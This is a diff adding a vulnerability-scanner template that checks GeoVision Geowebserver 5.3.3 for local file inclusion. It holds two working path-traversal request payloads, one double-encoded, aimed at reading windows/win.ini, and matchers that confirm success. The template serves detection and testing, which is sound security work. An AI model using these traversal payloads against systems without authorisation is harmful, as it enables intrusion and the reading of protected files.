diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml new file mode 100644 index 0000000000..b21cc51e04 --- /dev/null +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -0,0 +1,26 @@ +id: geowebserver-lfi + +info: + name: GeoVision Geowebserver 5.3.3 - LFI + author: madrobot + severity: high + reference: https://www.exploit-db.com/exploits/50211 + tags: geowebserver,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini" + - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + + - type: status + status: + - 200